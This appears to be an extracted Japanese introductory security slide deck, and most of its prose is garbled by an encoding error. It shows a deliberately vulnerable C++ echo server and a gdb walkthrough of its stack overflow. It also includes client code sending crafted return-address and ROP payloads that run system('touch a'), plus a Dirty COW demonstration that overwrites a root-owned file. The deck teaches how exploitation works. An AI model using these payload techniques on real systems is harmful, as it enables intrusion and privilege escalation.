セキュリティ入門

ηΩϡϦςΟೖ໳
NAOMASA MATSUBAYASHI

View Slide

ηΩϡϦςΟͷ໨ඪ

View Slide

େࣄͳσʔλ
αʔό
ળྑͳϢʔβ
ѱҙ͋ΔϢʔβ
େࣄͳσʔλΛकΔ࠷΋؆୯Ͱ࣮֬ͳํ๏͸
Ұ੾ͷΞΫηεΛड͚෇͚ͳ͍ࣄͰ͋Δ

View Slide

େࣄͳσʔλ
ળྑͳϢʔβ
ѱҙ͋ΔϢʔβ
αʔό
͔͠͠αʔό͸αʔϏεΛఏڙ͢ΔͨΊʹ
ϢʔβͷཁٻΛड͚෇͚ͳ͚Ε͹ͳΒͳ͍

View Slide

େࣄͳσʔλ
ળྑͳϢʔβ
ѱҙ͋ΔϢʔβ
αʔό
ҙਤͨ͠௨Γʹ࢖͏ϢʔβΛड͚෇͚ͳ͕Β
ҙਤ͠ͳ͍࢖͍ํΛ͢ΔϢʔβΛڋ൱͢Δඞཁ͕͋Δ

View Slide

༏ΕͨηΩϡϦςΟͱ͸
ҙਤͨ͠࢖͍ํͱ
ҙਤ͠ͳ͍࢖͍ํΛ
ΑΓਖ਼֬ʹࣝผ͢Δ͜ͱ͕Ͱ͖Δࣄ

View Slide

ҙਤ͠ͳ͍࢖͍ํͱ͸

View Slide

#include
#include
#include
namespace asio = boost::asio;
using boost::asio::ip::tcp;
using sock_p = std::shared_ptr< tcp::socket >;
using buf_p = std::shared_ptr< asio::streambuf >;
using error_type = boost::system::error_code;
struct session : public std::enable_shared_from_this< session > {
session( asio::io_service &io ) : sock( io ) {}
void read() {
boost::asio::async_read_until( sock, buf, '\n', boost::bind(
&session::check_on_read, shared_from_this(),
asio::placeholders::bytes_transferred, asio::placeholders::error
) );
}
void write( const char *data, size_t len ) {
boost::asio::async_write( sock, boost::asio::buffer( data, len ), boost::bind(
&session::check_on_write, shared_from_this(), asio::placeholders::error
) );
}
tcp::socket &get_socket() { return sock; }
private:
void check_on_read( size_t len, const error_type& e ) {
if( e && e != boost::asio::error::eof ) return;
on_read( len );
}
void on_read( size_t len ) {
char received[ 32 ];
std::memcpy( received, asio::buffer_cast( buf.data() ), len );
buf.consume( len );
https://wandbox.org/permlink/eucMJp4DkeLhnGlq
όάͷ͋ΔΤίʔαʔό

View Slide

buf.consume( len );
received[ len ] = '\0';
write( received, len );
}
void check_on_write( const error_type& e ) {
on_write();
}
void on_write() { read(); }
tcp::socket sock;
asio::streambuf buf;
};
struct server {
server( asio::io_service &io_ ) : io( io_ ), acc( io, tcp::endpoint( tcp::v4(), 20000 ) ) { accept(); }
void accept() {
std::shared_ptr< session > s( new session( io ) );
acc.async_accept( s->get_socket(), boost::bind( &server::on_accept, this, s, asio::placeholders::error ) );
}
private:
void on_accept( const std::shared_ptr< session > &s, const error_type& e ) {
if( !e ) s->read();
accept();
}
asio::io_service &io;
boost::asio::ip::tcp::acceptor acc;
};
int main() {
asio::io_service io;
server s( io );
io.run();
} https://wandbox.org/permlink/eucMJp4DkeLhnGlq

View Slide

}
buf.consume( len );
}
void check_on_write( const error_type& e ) {
on_write();
}
void on_write() { read(); }
tcp::socket sock;
asio::streambuf buf;
};
struct server {
server( asio::io_service &io_ ) : io( io_ ), acc( io, tcp::endpoint( tcp::v4(), 20000 ) ) { accept(); }
void accept() {
std::shared_ptr< session > s( new session( io ) );
acc.async_accept( s->get_socket(), boost::bind( &server::on_accept, this, s, asio::placeholders::error ) );
}
private:
void on_accept( const std::shared_ptr< session > &s, const error_type& e ) {
if( !e ) s->read();
accept();
}
asio::io_service &io;
boost::asio::ip::tcp::acceptor acc;
};
int main() {
asio::io_service io;
https://wandbox.org/permlink/eucMJp4DkeLhnGlq
ݻఆ௕ ௨৴Ͱड͚औͬͨσʔλ͕
ݻఆ௕ͷ഑ྻʹऩ·ΔαΠζͱ͸ݶΒͳ͍
ϦϞʔτ͔ΒόοϑΝΦʔόʔϥϯΛىͤ͜Δ
buf.consume( len );
}

View Slide

$ ./tiny_server
$ telnet localhost 20000
Trying ::1...
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Hello, World!
Hello, World!
ૹ৴ͨ͠σʔλ όΠτ

ΫϥΠΞϯτ αʔό
ड৴ͨ͠σʔλ όΠτ

receivedͷαΠζʹऩ·͍ͬͯΔ৔߹ɺҙਤͨ͠ಈ͖Λ͍ͯ͠Δ

View Slide

$ telnet localhost 20000
Trying ::1...
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
Hello, World! I would like to
crash this server. Blah blah
blah...
Hello, World! I would like to
crash this server. Blah blah
blah...
Connection closed by foreign
host.
ΫϥΠΞϯτ αʔό
$ ./tiny_server
Segmentation fault
αʔό͕ࢮΜͩ

View Slide

߈ܸऀ͕αʔϏεΛར༻ෆೳʹͰ͖ΔࣄΛ
Denial of Service߈ܸ
ུͯ͠DoS߈ܸ͕Մೳͱݴ͏

View Slide

ͱ͜ΖͰ͖ͬ͞ͷαʔό͸
ԿނࢮΜͩ

View Slide

$ gdb -q tiny_server
Reading symbols from tiny_server...done.
(gdb) disas session::on_read
Dump of assembler code for function session::on_read(unsigned long):
…
0x000000000040a6c3 <+69>: callq 0x403340
0x000000000040a6c8 <+74>: mov -0x38(%rbp),%rax
…
(gdb) b *0x40a6c3
Breakpoint 1 at 0x40a6c3: file tiny_server.cpp, line 38.
(gdb) b *0x40a6c8
Breakpoint 2 at 0x40a6c8: file tiny_server.cpp, line 39.
(gdb) run
Starting program: /home/fadis/tiny_server
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib64/libthread_db.so.1".
Breakpoint 1, 0x000000000040a6c3 in session::on_read (this=0x632ef0, len=68) at
tiny_server.cpp:38
38 std::memcpy( received, asio::buffer_cast( buf.data() ), len );
(gdb) p &received
$1 = (char (*)[32]) 0x7fffffffd2c0
(gdb) x/40wx 0x7fffffffd2c0
0x7fffffffd2c0: 0xffffd380 0x00007fff 0x0040fe53 0x00000000
0x7fffffffd2d0: 0x006331b0 0x00000000 0x00000044 0x00000000
σόοΨͰαʔό͕ࢮΜͩॠؒΛݟͯΈΑ͏
Ͳ͜ʹ໰୊͕͋Δ͔͸طʹΘ͔͍ͬͯΔͷͰ
όοϑΝΦʔόʔϥϯΛҾ͖ى͜͢memcpyͷલޙͰ
ϒϨʔΫϙΠϯτΛு͓ͬͯ͘

View Slide

tiny_server.cpp:38
(gdb) p &received
0x7fffffffd2e0: 0x006331b0 0x00000000 0x00000044 0x00000000
0x7fffffffd2f0: 0xffffd340 0x00007fff 0x0040a674 0x00000000
0x7fffffffd300: 0x00000043 0x00000000 0xffffd5d0 0x00007fff
0x7fffffffd310: 0x00000044 0x00000000 0x00632ef0 0x00000000
0x7fffffffd320: 0xffffd340 0x00007fff 0x00412898 0x00000000
0x7fffffffd330: 0xffffd5c0 0x00007fff 0x00000044 0x00000000
0x7fffffffd340: 0xffffd380 0x00007fff 0x00411cdc 0x00000000
0x7fffffffd350: 0xffffd7b0 0x00007fff 0xffffd5d0 0x00007fff
(gdb) c
Continuing.
Breakpoint 2, session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:39
39 buf.consume( len );
0x7fffffffd2c0: 0x6c6c6548 0x57202c6f 0x646c726f 0x20492021
0x7fffffffd2d0: 0x6c756f77 0x696c2064 0x7420656b 0x7263206f
0x7fffffffd2e0: 0x20687361 0x73696874 0x72657320 0x2e726576
ΫϥΠΞϯτ͔Βಧ͍ͨϝοηʔδΛ
receivedʹॻ͖ࠐΉ௚લͷ
received͔Β256όΠτͷϝϞϦͷঢ়ଶ
receivedͷͨΊʹ֬อ͞Ε͍ͯΔ32όΠτ

View Slide

(gdb) c
Continuing.
0x7fffffffd2f0: 0x616c4220 0x6c622068 0x62206861 0x2e68616c
0x7fffffffd300: 0x0a0d2e2e 0x00000000 0xffffd5d0 0x00007fff
(gdb) i r rsp rbp
rsp 0x7fffffffd2b0 0x7fffffffd2b0
rbp 0x7fffffffd2f0 0x7fffffffd2f0
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x000000000040a706 in session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:42
42 }
ΫϥΠΞϯτ͔Βಧ͍ͨϝοηʔδΛ
receivedʹॻ͖ࠐΜͩ௚ޙͷ
received͔Β256όΠτͷϝϞϦͷঢ়ଶ

View Slide

(gdb) c
Continuing.
(gdb) i r rsp rbp
(gdb) c
Continuing.
42 }
͜ͷҐஔʹվߦจࣈ͕ݟ͑ΔͨΊ
഑ྻͷऴ୺Λ௒͑ͯ
͜͜·Ͱॻ͖ࠐΈ͕ߦΘΕͨ͜ͱ͕Θ͔Δ

View Slide

(gdb) i r rsp rbp
(gdb) c
Continuing.
42 }
(gdb) backtrace
#0 0x000000000040a706 in session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:42
#1 0x2e68616c62206861 in ?? ()
#2 0x000000000a0d2e2e in ?? ()
#3 0x00007fffffffd5d0 in ?? ()
#4 0x0000000000000044 in ?? ()
#5 0x0000000000632ef0 in ?? ()
#6 0x00007fffffffd340 in ?? ()
#7 0x0000000000412898 in boost::get_pointer (
p=)
at /usr/include/boost/get_pointer.hpp:69
Backtrace stopped: Cannot access memory at address 0x6c622068616c4228
(gdb) disas
…
=> 0x000000000040a706 <+136>: retq
End of assembler dump.
(gdb)
Կॲ
࣮ߦΛଓ͚Δͱon_read͔Βreturnͨ͠ॴͰࢮ͵
όοΫτϨʔεΛݟΔͱon_read͕ฦΖ͏ͱͨ͠
ݺͼग़͠ݩͷؔ਺ͷΞυϨε͕͓͔͍͠

View Slide

(gdb) c
Continuing.
(gdb) i r rsp rbp
(gdb) c
Continuing.
42 }
(gdb) backtrace
#0 0x000000000040a706 in session::on_read (this=0x632ef0, len=68) at tiny_server.cpp:42
#1 0x2e68616c62206861 in ?? ()
#2 0x000000000a0d2e2e in ?? ()
͜ͷΞυϨε͸
͖ͬ͞ॻ͖ࠐΜͩϝοηʔδͷҰ෦ͩ

View Slide

$16ͷߏ଄
CPU
rax rbx
rcx rdx
rsi rdi
rbp rsp
r8 r9
r10 r11
r12 r13
r14 r15
ࠓ೔ͷIntelϓϩηοαʹ͸
ܭࢉʹ࢖͏஋ΛೖΕ͓ͯ͘ശ(Ϩδελ)͕
16ݸඋΘ͍ͬͯΔ
16ݸͰ͸଍Γͳ͘ͳͬͨΒ
ࠓ͙͍͢Βͳ͍஋ΛϝϞϦʹҠͯ͠ϨδελΛۭ͚Δ

View Slide

ελοΫ
CPU
rax rbx
rcx rdx
rsi rdi
rbp rsp
r8 r9
r10 r11
r12 r13
r14 r15
Ϩδελ͔Βୀආͨ͠஋͕ੵ·Ε͍ͯ͘
ୀආͨ͠஋͕࠶ͼඞཁʹͳͬͨΒ
্͔ΒऔΓग़͍ͯ͘͠
rdi͔ΒҠͨ͠஋
rax͔ΒҠͨ͠஋
rbp͔ΒҠͨ͠஋
rdi͔ΒҠͨ͠஋
͜ͷΑ͏ʹ࢖ΘΕΔϝϞϦྖҬΛ
ελοΫͱݺͿ

View Slide

ελοΫ
int f( int x, int y ) {
int i;
i = x * y;
return i;
}
͜ͷiͷΑ͏ͳϩʔΧϧม਺͸
ελοΫͷதʹஔ͔Ε͍ͯΔ
ଞͷม਺౳
ଞͷม਺౳
ଞͷม਺౳
i
ϩʔΧϧม਺͕࡞ΒΕΔͱελοΫʹ஋͕ੵ·Ε
είʔϓΛൈ͚ΔͱελοΫͷ஋͕ഁغ͞ΕΔ

View Slide

int f( int i, int j ) {
return i + j;
}
int g() {
return f( 2, 3 );
}
ؔ਺ݺͼग़͠Λߦ͏ͱcallq໋ྩ͕ੜ੒͞ΕΔ
return͢Δͱretq໋ྩ͕ੜ੒͞ΕΔ
00000000004004b6 :
4004b6: 55 push %rbp
4004b7: 48 89 e5 mov %rsp,%rbp
4004ba: 89 7d fc mov %edi,-0x4(%rbp)
4004bd: 89 75 f8 mov %esi,-0x8(%rbp)
4004c0: 8b 55 fc mov -0x4(%rbp),%edx
4004c3: 8b 45 f8 mov -0x8(%rbp),%eax
4004c6: 01 d0 add %edx,%eax
4004c8: 5d pop %rbp
4004c9: c3 retq
00000000004004ca :
4004ca: 55 push %rbp
4004cb: 48 89 e5 mov %rsp,%rbp
4004ce: be 03 00 00 00 mov $0x3,%esi
4004d3: bf 02 00 00 00 mov $0x2,%edi
4004d8: e8 d9 ff ff ff callq 4004b6
4004dd: 5d pop %rbp
4004de: c3 retq
callq͸ελοΫʹ
callqͷ࣍ͷΞυϨεΛੵΜͰ
Ҿ਺Ͱࢦఆ͞ΕͨΞυϨεʹඈͿ
retq͸ελοΫͷઌ಄ʹੵ·Εͨ
ΞυϨεʹඈΜͰ
ελοΫͷઌ಄ͷ஋ΛࣺͯΔ
͜ͷ૊Έ߹ΘͤͰ
ؔ਺Λൈ͚ͨΒݩͷ৔ॴʹ໭Δ
͕࣮ݱ͞Ε͍ͯΔ

View Slide

ؔ਺fͷม਺
ؔ਺fͷม਺
ؔ਺fͷม਺
ؔ਺g͕ऴΘͬͨΒ໭ΔҐஔ
ؔ਺gͷม਺
ؔ਺gͷม਺
ؔ਺h͕ऴΘͬͨΒ໭ΔҐஔ
ؔ਺hͷม਺
ؔ਺hͷม਺
ؔ਺hͷม਺
ؔ਺f͕ؔ਺gΛݺΜͰ
ͦͷதͰؔ਺h͕ݺ͹Ε͍ͯΔ࣌ͷελοΫ
࣮ߦதͷؔ਺ʹͱͬͯͷ
ελοΫͷઌ಄ͱ຤ඌͷҐஔ͸$16ͷ
%rspϨδελͱ%rbpϨδελʹ
ه࿥͞Ε͍ͯΔ

View Slide

ؔ਺fͷม਺
ؔ਺fͷม਺
ؔ਺fͷม਺
ؔ਺g͕ऴΘͬͨΒ໭ΔҐஔ
ؔ਺gͷม਺
ؔ਺gͷม਺
ؔ਺h͕ऴΘͬͨΒ໭ΔҐஔ
ؔ਺hͷม਺
ؔ਺hͷม਺
ؔ਺hͷม਺
ؔ਺͸callq͞ΕͨΒ·ͣ
ݱࡏͷ%rbpΛελοΫʹੵΜͰ
%rbpΛ%rspʹ͢Δ
ͭ·Γݺͼग़͠ݩͷؔ਺ͷελοΫͷઌ಄Λ
͜Ε͔Β࣮ߦ͢Δؔ਺ͷελοΫͷ຤ඌʹ͢Δ

ؔ਺fͷSCQ
ؔ਺gͷSCQ
ؔ਺͔Βretq͢Δ௚લʹ
%rbpΛελοΫͷઌ಄ͷ஋ʹͯ͠
ελοΫͷઌ಄ͷ஋Λഁغ͢Δ

View Slide

00000000004004b6 :
4004b6: 55 push %rbp
4004b7: 48 89 e5 mov %rsp,%rbp
4004ba: 89 7d fc mov %edi,-0x4(%rbp)
4004bd: 89 75 f8 mov %esi,-0x8(%rbp)
4004c0: 8b 55 fc mov -0x4(%rbp),%edx
4004c3: 8b 45 f8 mov -0x8(%rbp),%eax
4004c6: 01 d0 add %edx,%eax
4004c8: 5d pop %rbp
4004c9: c3 retq
00000000004004ca :
4004ca: 55 push %rbp
4004cb: 48 89 e5 mov %rsp,%rbp
4004ce: be 03 00 00 00 mov $0x3,%esi
4004d3: bf 02 00 00 00 mov $0x2,%edi
4004d8: e8 d9 ff ff ff callq 4004b6
4004dd: 5d pop %rbp
4004de: c3 retq
SCQΛελοΫʹੵΉ
SCQΛSTQͷ஋ʹ͢Δ
SCQΛελοΫͷ஋ʹ͢Δ
ελοΫʹॻ͔ΕͨΞυϨεʹ໭Δ
͜ͷล͕ؔ਺ͷॲཧͷຊମ

View Slide

(gdb) run
tiny_server.cpp:38
(gdb) p &received
0x7fffffffd2e0: 0x006331b0 0x00000000 0x00000044 0x00000000
0x7fffffffd2f0: 0xffffd340 0x00007fff 0x0040a674 0x00000000
0x7fffffffd300: 0x00000043 0x00000000 0xffffd5d0 0x00007fff
(gdb) c
Continuing.
͔͜͜Β্͕
on_readͷελοΫ
(gdb) i r rsp rbp
on_readʹுͬͨϒϨʔΫϙΠϯτͰͷ
%rbpͱ%rspͷ஋
on_readΛݺͼग़ͨؔ͠਺ͷ%rbp
on_read͕returnͨ͠ࡍʹඈͿઌͷΞυϨε
όοϑΝΦʔόʔϥϯલ

View Slide

(gdb) c
Continuing.
(gdb) i r rsp rbp
(gdb) c
Continuing.
͔͜͜Β্͕
on_readͷελοΫ
(gdb) i r rsp rbp
on_readʹுͬͨϒϨʔΫϙΠϯτͰͷ
%rbpͱ%rspͷ஋
on_readΛݺͼग़ͨؔ͠਺ͷ%rbp
on_read͕returnͨ͠ࡍʹඈͿઌͷΞυϨε
όοϑΝΦʔόʔϥϯޙ
returnΞυϨε͕ॻ͖׵Θͬͯ͠·ͬͨ

View Slide

#1 0x2e68616c62206861 in ?? ()
#2 0x000000000a0d2e2e in ?? ()
returnΞυϨε͕ॻ͖׵Θͬͨঢ়ଶͰretqͨ݁͠Ռ
ΞυϨε͕ࢦ͢ઌͷϝϞϦʹΞΫηεͰ͖ͳ͔ͬͨҝ
ൣғ֎ࢀরͰϓϩηε͕ఀࢭͨ͠
όοϑΝΦʔόʔϥϯʹΑͬͯ
഑ྻreceivedͷઌʹஔ͍ͯ͋ͬͨ
returnΞυϨε͕ॻ͖׵͑ΒΕͯ͠·ͬͨ

View Slide

ॻ͖׵͑ΒΕͨΞυϨε͕
ΞΫηεՄೳͩͬͨΒ
Կ͕ى͍ͬͯͨ͜

View Slide

#include
#include
int main() {
asio::io_service io_service;
tcp::socket socket(io_service);
socket.connect( tcp::endpoint( asio::ip::address::from_string("127.0.0.1"), 20000 ) );
std::vector< uint8_t > data {
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xb0, 0x31, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00,
0x42, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xe0, 0x24, 0xf6, 0xf6, 0xff, 0x7f, 0x00, 0x00,
0x0d, 0x0a,
};
boost::system::error_code error;
asio::write(socket, asio::buffer(data), error);
return 0;
if( !error ) {
asio::streambuf receive_buffer;
asio::read_until(socket, receive_buffer, '\n', error);
std::cout << asio::buffer_cast(receive_buffer.data()) << std::endl;
}
}
ࡉ޻ͨ͠σʔλΛૹΔΫϥΠΞϯτ

View Slide

#include
#include
int main() {
socket.connect( tcp::endpoint( asio::ip::address::from_string("127.0.0.1"), 20000 ) );
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xb0, 0x31, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00,
0x42, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xe0, 0x24, 0xf6, 0xf6, 0xff, 0x7f, 0x00, 0x00,
0x0d, 0x0a,
};
return 0;
if( !error ) {
}
}
(gdb) disas abort
Dump of assembler code for function abort:
0x00007ffff6f624e0 <+0>: sub $0x128,%rsp
0x00007ffff6f624e7 <+7>: mov %fs:0x10,%rdx
…
Cݴޠඪ४ϥΠϒϥϦͷabortؔ਺ͷΞυϨε͕
ελοΫͷreturnΞυϨεͷҐஔʹདྷΔΑ͏ʹ
αʔόʹૹΔσʔλΛ࡞Δ

View Slide

$ ./pktgen
ΫϥΠΞϯτ αʔό
$ gdb -q ./tiny_server
Reading symbols from ./tiny_server...done.
(gdb) run
[Thread debugging using libthread_db
enabled]
Using host libthread_db library "/lib64/
libthread_db.so.1".
Program received signal SIGABRT, Aborted.
0x00007ffff6f61228 in raise () from /
lib64/libc.so.6
(gdb) backtrace
#0 0x00007ffff6f61228 in raise () from /
lib64/libc.so.6
#1 0x00007ffff6f6264a in abort () from /
lib64/libc.so.6
#2 0x0000000000000a0d in ?? ()
SIGSEGVͰ͸ͳ͘SIGABRTͰαʔό͕ఀࢭͨ͠

View Slide

Program received signal SIGABRT, Aborted.
0x00007ffff6f61228 in raise () from /
lib64/libc.so.6
(gdb) backtrace
#0 0x00007ffff6f61228 in raise () from /
lib64/libc.so.6
#1 0x00007ffff6f6264a in abort () from /
lib64/libc.so.6
#2 0x0000000000000a0d in ?? ()
#4 0x0000000000000042 in ?? ()
#5 0x0000000000632ef0 in ?? ()
#6 0x00007fffffffd340 in ?? ()
#7 0x0000000000412898 in
boost::get_pointer (
p=access memory at address
0xfffffffffffffff9>)
at /usr/include/boost/get_pointer.hpp:
69
Backtrace stopped: previous frame inner to
this frame (corrupt stack?)
αʔόͷίʔυ্Ͱ͸
ݺΜͰ͍ͳ͍
abortؔ਺͕
ݺ͹Εͨ͜ͱʹͳ͍ͬͯΔ

View Slide

߈ܸऀ͕ࢦఆͨؔ͠਺͕
࣮ߦ͞Εͯ͠·ͬͨ

View Slide

߈ܸऀ͸αʔόͷίϯτϩʔϧΛखʹೖΕ͍ͨ
ͦͷͨΊʹ͸shellΛىಈ͍ͨ͠
खͬऔΓૣ͘shellΛ্ཱͪ͛Δʹ͸
system("࣮ߦ͍ͨ͠ίϚϯυ");
Λݺ΂Ε͹ྑ͍
೚ҙͷؔ਺Λݺ΂Δ͚ͩͰͳ͘
೚ҙͷจࣈྻΛҾ਺ͱͯ͠౉ͤΔඞཁ͕͋Δ

View Slide

[1] System V Application Binary Interface AMD64 Architecture Processor Supplement
§3.5.7 Variable Argument Lists
x86_64 LinuxͰ͸ؔ਺ͷୈҰҾ਺͸
%rdiϨδελͰ౉͢͜ͱʹͳ͍ͬͯΔ[1]
࣮ߦ͍ͨ͠ίϚϯυΛϝϞϦʹॻ্͍ͨͰ
Կͱ͔ͯͦ͠ͷΞυϨεΛ%rdiʹ৐ͤͯ
retqͰؔ਺Λݺͼग़͢ඞཁ͕͋Δ
rax rbp r8 r12
rbx rsp r9 r13
rcx rsi r10 r14
rdx rdi r11 r15

View Slide

(gdb) disas _ZNSi6ignoreEl
…
0x00007ffff788dfc5 <+309>: pop %r14
0x00007ffff788dfc7 <+311>: retq
0x7ffff788dfc5
ඪ४ϥΠϒϥϦ౳͔Βpopͯ͠retq͍ͯ͠ΔॴΛ୳ͯ͘͠Δ
%r14ʹஔ͖͍ͨ஋
ͦͷޙʹ࣮ߦ͍ͨ͠ΞυϨε
ελοΫʹࠨͷΑ͏ʹॻ͍ͯretq͢Δͱ
%r14ʹ೚ҙͷ஋Λஔ͘͜ͱ͕Ͱ͖Δ
Return Oriented Programming
ૢ࡞͍ͨ͠ϨδελΛpopͯ͠retq͍ͯ͠ΔॴΛݟ͚ͭΕ͹
೚ҙͷҾ਺Λ͚ͭͯ೚ҙͷؔ਺Λݺͼग़͢͜ͱ͕Ͱ͖Δ

View Slide

#include
#include
int main() {
socket.connect(
tcp::endpoint( asio::ip::address::from_string("127.0.0.1"), 20000 )
);
const std::vector< uint8_t > command{
't', 'o', 'u', 'c', 'h', ' ', 'a', 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
};
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xb0, 0x31, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00,
0xf2, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x54, 0x1f, 0x93, 0xf7, 0xff, 0x7f, 0x00, 0x00,
0xa0, 0xd3, 0xff, 0xff, 0xff, 0x7f, 0x00, 0x00,
0x50, 0xd3, 0xf6, 0xf6, 0xff, 0x7f, 0x00, 0x00,
ద౰ͳϑΝΠϧΛ࡞੒

View Slide

0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xb0, 0x31, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00,
0xf2, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x54, 0x1f, 0x93, 0xf7, 0xff, 0x7f, 0x00, 0x00,
0x50, 0xd3, 0xf6, 0xf6, 0xff, 0x7f, 0x00, 0x00,
0xc0, 0xe5, 0x00, 0xf7, 0xff, 0x7f, 0x00, 0x00,
0x90, 0x3b, 0xf6, 0xf6, 0xff, 0x7f, 0x00, 0x00
};
for( size_t i = 0u; i != 10u; ++i )
std::copy( command.begin(), command.end(), std::back_inserter( data ) );
data.push_back( 0x0d );
data.push_back( 0x0a );
return 0;
if( !error ) {
}
}

View Slide

socket.connect(
);
't', 'o', 'u', 'c', 'h', ' ', 'a', 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
};
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xb0, 0x31, 0x63, 0x00, 0x00, 0x00, 0x00, 0x00,
0xf2, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x54, 0x1f, 0x93, 0xf7, 0xff, 0x7f, 0x00, 0x00,
0x50, 0xd3, 0xf6, 0xf6, 0xff, 0x7f, 0x00, 0x00,
0xc0, 0xe5, 0x00, 0xf7, 0xff, 0x7f, 0x00, 0x00,
0x90, 0x3b, 0xf6, 0xf6, 0xff, 0x7f, 0x00, 0x00
};
for( size_t i = 0u; i != 10u; ++i )
QPQSEJͯ͠SFURͯ͠Δίʔυʹ
ඈͿͨΊͷΞυϨε
SEJʹ৐ͤΔ஋
࣮ߦ͍ͨ͠ίϚϯυ

system()
sync()
exit()
γΣϧεΫϦϓτ

View Slide

$ ./pktgen
ΫϥΠΞϯτ αʔό
(gdb) run
[Thread debugging using libthread_db
enabled]
Using host libthread_db library "/lib64/
libthread_db.so.1".
[Inferior 1 (process 11310) exited with
code 02]
(gdb) quit
$ ls
a tiny_server
ͳΜ͔Ͱ͖ͯΔ

View Slide

߈ܸऀ͕αʔό্Ͱ
೚ҙͷૢ࡞Λग़དྷͯ͠·ͬͨ

View Slide

߈ܸऀ͕࣮ߦͨ͠shell͸
߈ܸΛड͚ͨϓϩηεΛ࣮ߦͨ͠ϢʔβͷݖݶͰಈ͘
߈ܸΛड͚ͨϓϩηε͕
rootͰಈ͍͍ͯͳ͔ͬͨ৔߹
߈ܸऀ͸αʔόͷ׬શͳঠѲͷͨΊʹ
ݖݶঢ֨Λߦ͏ඞཁ͕͋Δ
Permission Denied

View Slide

ݖݶঢ֨ʹ༻͍ΒΕΔ੬ऑੑͷྫ
https://dirtycow.ninja/
͜͜ʹ
%*35:$08ͷτοϓϖʔδΛషΔ

View Slide

DIRTY COW(CVE-2016-5195)
mmap࣌ʹMAP_PRIVATEΛ͚ͭΔͱ
ϑΝΠϧʹର͢Δॻ͖ࠐΈΛ
ΦϦδφϧͷϑΝΠϧʹ
ॻ͔ͳ͍Α͏ʹ͢Δ͜ͱ͕Ͱ͖Δ
ॻ͖ࠐΈ
ಡΈग़͠
ϓϩηε͔Β
ݟͨϑΝΠϧ
ΦϦδφϧͷ
ϑΝΠϧ
ΞυϨεۭؒ

View Slide

ʮ࢑͘࢖Θͳ͍͔Βॻ͖ࠐΈͷ४උΛϝϞϦ͔ΒԼ͛ͯྑ͍ʯ
ࢦఆΛߦ͏ͷͱಉ࣌ʹॻ͖ࠐΈΛߦ͏ͱ
ΦϦδφϧͷϑΝΠϧʹॻ͍ͯ͠·͏ෆ۩߹
ΦϦδφϧͷϑΝΠϧʹ
ॻ͖ʹ͍ͬͯ͠·͏
ϓϩηε͔Β
ݟͨϑΝΠϧ
ΦϦδφϧͷ
ϑΝΠϧ
MADV_DONTNEEDͰ
ϝϞϦ͔ΒԼ͛Δ

View Slide

https://github.com/kcgthb/RHEL6.x-COW/blob/master/6.7/noc0w.patch
͜ͷෆ۩߹ࣗମ͸ෳࡶͳ΋ͷͰ͸ͳ͘मਖ਼ύον͸ߦఔ
͜͜ʹ
%*35:$08ͷमਖ਼ύονΛషΔ

View Slide

root # echo 'abcde' >sample.txt
root # ls -lha sample.txt
-rw-r--r-- 1 root root 6 Mar 18 11:21 sample.txt
root # logout
non_root $ cat sample.txt
abcde
non_root $ ./dirtyc0w sample.txt ‘pwned'
mmap 7f214599a000
^C
non_root $ cat sample.txt
pwned
non_root $ ls -lha sample.txt
-rw-r--r-- 1 root root 6 3݄ 18 11:21 sample.txt
ҰൠϢʔβ͕
root͔͠ॻ͚ͳ͍ϑΝΠϧΛ
ॻ͖׵͑ͯ͠·ͬͨ
͜Ε͕ՄೳͳΒrootϩάΠϯͷೝূΛແ͘͢͜ͱͩͬͯग़དྷΔ

View Slide

CVE-2017-15265
